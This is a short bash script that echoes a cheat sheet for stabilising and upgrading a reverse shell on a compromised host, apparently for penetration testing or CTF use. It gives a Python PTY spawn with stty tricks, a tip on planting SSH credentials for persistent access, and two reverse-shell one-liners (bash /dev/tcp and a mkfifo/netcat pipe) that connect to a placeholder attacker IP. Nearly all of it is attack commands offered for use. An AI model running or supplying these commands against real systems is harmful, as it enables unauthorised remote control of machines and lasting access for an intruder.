#!/bin/bash

echo "Here are some ways to get a better shell when you already have a reverse shell unless specified otherwise."
echo ""
echo "	(1) Upgrade to bash or sh shell. Type /bin/bash or /bin/sh into your shell."
echo ""
echo "	(2) Use Python. Run the following sequence of commands in your shell."
echo "		2.1) python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
echo "		2.2) export TERM=xterm"
echo "		2.3) Close the shell by running: ctrl+z"
echo "		2.4) Run the command on the command line: stty raw -echo ; fg"
echo ""
echo "	(3) While in a shell, use bash tcp to connect to a listener on attacker machine"
echo "		bash -c \"bash -i >& /dev/tcp/<attacker-ip>/<listener-port> 0>&1\""
echo ""
echo "	(4) Use ssh. Using the shell, put your ssh credentials on the remote host so that you can ssh into it."
echo ""
echo "	(5) Have listener open on chosen port and run the command"
echo "		rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-ip> <listen-port> >/tmp/f"

